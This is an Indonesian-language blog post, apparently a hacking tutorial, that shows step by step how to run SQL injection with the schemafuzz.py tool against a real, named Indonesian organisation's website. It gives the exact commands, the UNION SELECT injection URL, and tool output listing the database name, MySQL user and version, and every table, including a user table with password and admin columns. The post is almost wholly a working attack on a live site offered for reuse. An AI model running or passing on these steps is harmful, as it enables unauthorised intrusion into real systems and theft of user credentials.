1.Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
2.Schemafuzz (http://darkc0de.com/others/schemafuzz.py)
3.CMD
Dg cmd masuk ke folder tempat schemafuzz.py berada...
Awali pertintah dengan format:
schemafuzz.py -u "url target" --perintah
List perintah ada dibawah...
1.Cari target
Misal: http://www.ditplb.or.id/profile.php?id=1
2.Masukkan perintah untuk mencari colom
Misal: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1"; --findcol
Maka keluar:
[+] URL: http://www.ditplb.or.id/profile.php?id=1--
[+]
Evasion Used: "+" "--"
[+] 20:36:29
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,
[+] Column Length is: 3
[+] Found null column at column #: 2
[+] SQLi URL:
http://www.ditplb.or.id/profile.php?id=1+AND+1%3D2+UNION+SELECT+0%2C1%2C2--
[+] darkc0de
URL: http://www.ditplb.or.id/profile.php?id=1+AND+1%3D2+UNION+SELECT+0%2C1%2Cdarkc0de
[-] Done!
Berarti kita gunain
http://www.ditplb.or.id/profile.php?id=1+AND+1%3D2+UNION+SELECT+0%2C1%2Cdarkc0de
untuk inject
3.Cari database dg command --dbs
Misal : schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1%3D2+UNION+SELECT+0%2C1%2Cdarkc0de";
--dbs
Maka keluar:
[+] URL:
http://www.ditplb.or.id/profile.php?id=1+AND+1%3D2+UNION+SELECT+0%2C1%2Cdarkc0de--
[+] Evasion Used: "+" "--"
[+] 20:39:32
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_pl...@localhost
Version: 5.0.32-Debian_7etch8
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0] t15618_plb
[-] 20:39:39
[-] Total URL Requests 3
[-] Done
keliatan kan nama databasenya ??? t15618_plb
4.Cari nama table dalam database
Misal: schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1%3D2+UNION+SELECT+0%2C1%2Cdarkc0de";
--schema -D namadatabase
Jadinya: schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1%3D2+UNION+SELECT+0%2C1%2Cdarkc0de";
--schema -D t15618_plb
Maka keluar:
[+] URL:
http://www.ditplb.or.id/profile.php?id=1+AND+1%3D2+UNION+SELECT+0%2C1%2Cdarkc0de--
[+] Evasion Used: "+" "--"
[+] 20:43:10
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_pl...@localhost
Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database "t15618_plb"
[+] Number of Tables: 11
[Database]: t15618_plb
[Table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin
[-] 20:44:39
[-] Total URL Requests 43
[-] Done
Tidak ada komentar:
Posting Komentar